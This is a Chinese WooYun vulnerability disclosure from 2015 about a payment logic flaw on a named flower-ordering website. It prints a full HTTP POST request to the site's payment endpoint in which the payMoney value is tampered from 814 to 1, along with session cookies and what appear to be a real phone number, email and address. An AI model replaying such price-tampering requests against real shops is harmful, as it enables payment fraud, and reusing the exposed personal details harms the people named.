当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102650

漏洞标题:情人节再也不用担心买不起花了(某卖花网站支付漏洞)

相关厂商:订花人

漏洞作者: ssss

提交时间:2015-03-24 11:55

修复时间:2015-05-08 11:56

公开时间:2015-05-08 11:56

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

买不起花。。。

详细说明:

POST /orderfast_pay_do.asp HTTP/1.1
Host: www.dinghuaren.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.dinghuaren.com/orderfast_pay.asp?ordercode=DC2015320173949218
Cookie: ASPSESSIONIDSCCDTRRC=JKJDJPJBHHNGGDAJJEIJBFGK; CNZZDATA1086687=cnzz_eid%3D383490129-1426835882-%26ntime%3D1426842419; AJSTAT_ok_pages=16; AJSTAT_ok_times=1; user%5Fname=qq%5F%5FA457B; bdshare_firstime=1426841342234; IESESSION=alive; pgv_pvi=1867654144; pgv_si=s8342984704; XiaBoleGuestNumberID=qq%5F%5FA457B; cart=anonYmous=0&buyamount=1&seeddate=2015%2D3%2D21&address=%C7%FA%BE%B8%CA%A6%B7%B6%D1%A7%D4%BA%D4%BA%CC%D2%D4%B7%C8%FD116%CA%D2&sendname=%B9%F9%BD%F0&timing%5Fprice=0&signed=%B8%E7%B8%E7&seedminute=%2D1&seedemail=odayhacker%40126%2Ecom&seedtel=18325622562&cardscontent=%C9%B3%C9%B3%A1%A3&receivetel=18325622562&seedqq=3651706&countychar=%F7%E8%F7%EB%C7%F8&citychar=%C7%FA%BE%B8%CA%D0&provinceschar=%D4%C6%C4%CF&receivename=%CD%F5%C9%B3%C9%B3&goodsid=1197&payid=&addedcontent=&seedhour=0&dispatch=20&goodsprice%5Fs=814&seedtime=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
orderCode=DC2015320173949218&payMoney=814&bankType=directPay%3A1003


814——1

漏洞证明:

屏幕快照 2015-03-20 下午5.42.53.png

屏幕快照 2015-03-20 下午5.44.04.png

屏幕快照 2015-03-20 下午5.47.16.png

修复方案:

这个测试订单先取消了吧~
嘿嘿,如果能送最好了,
求高rank~

版权声明:转载请注明来源 ssss@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝